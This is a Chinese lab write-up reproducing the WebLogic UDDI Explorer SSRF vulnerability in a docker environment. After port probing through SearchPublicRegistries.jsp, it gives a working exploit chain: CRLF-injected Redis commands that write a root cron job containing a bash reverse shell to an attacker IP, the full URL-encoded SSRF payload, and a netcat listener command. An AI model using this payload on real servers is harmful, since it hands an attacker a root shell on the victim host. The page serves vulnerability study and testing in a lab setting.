Weblogic SSRF漏洞

Weblogic SSRF漏洞

1.环境搭建

复制代码
http://10.9.75.198:7001/uddiexplorer/

2.漏洞复现

复制代码
SSRF漏洞存在于http://10.9.75.198:7001/uddiexplorer/SearchPublicRegistries.jsp

2.1bp抓包,测试该漏洞。通过测试端口,查看哪个端口能够进行具体得操作

复制代码
可访问的端口将会得到错误,一般是返回status code(如下图),如果访问的非http协议,则会返回did not have a valid SOAP content-type。
复制代码
修改为一个不存在的端口,将会返回could not connect over HTTP to server。

2.2注入HTTP头,利用Redis反弹shell

复制代码
 查看redis服务端口
 sudo docker ps -a
 查看redis服务IP
 sudo docker exec -it 9094b4d80469  /bin/bash
 172.13.0.2:6379
复制代码
发送三条redis命令,将弹shell脚本写入/etc/crontab::
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/10.9.75.198/21 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

进行url编码:
set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.75.198%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave


注意,换行符是"\r\n",也就是"%0D%0A"。将url编码后的字符串放在ssrf的域名后面,发送:
http://172.23.0.2:63/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.9.75.198%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0A



注:将evil换成kali得IP
复制代码
打开监听:
nc -lnvp 21
相关推荐
启雀AI4 小时前
生物医疗行业如何建设合规、安全、可复用的知识库?
人工智能·安全·软件构建·知识图谱·知识库
Sirius Wu5 小时前
OpenClaw Skill:Matplotlib 可视化技能 + 沙箱双层隔离完整详解
服务器·网络·人工智能·安全·ai·架构·aigc
冬奇Lab5 小时前
每日一个开源项目(第160篇):Destructive Command Guard - 在 AI Agent 运行 rm -rf 之前拦截它
人工智能·安全·开源
ChainSafeAI0027 小时前
Summer.fi 遭600万美元漏洞攻击,安全警报拉响
安全
一勺菠萝丶9 小时前
生产环境平滑升级实战-Nginx维护页数据库迁移与安全回滚
数据库·nginx·安全
味悲10 小时前
搭建WAF+宝塔反向代理
安全
BenSmith11 小时前
RTOS漏洞分析:CVE-2026-10641和CVE-2026-9263
安全
happyness4412 小时前
AI重构实战案例:安全地将旧系统中大量基于 Thread 和同步阻塞的硬件通信代码,重构为现代的 async/await Task 异步架构
人工智能·安全·重构
Dola_Zou12 小时前
以CmASIC重塑AI+边缘设备的安全与商业复利
人工智能·安全·软件工程·软件加密
小小小小钰儿13 小时前
网络安全名词术语!
安全·web安全·计算机·网络安全·黑客·编程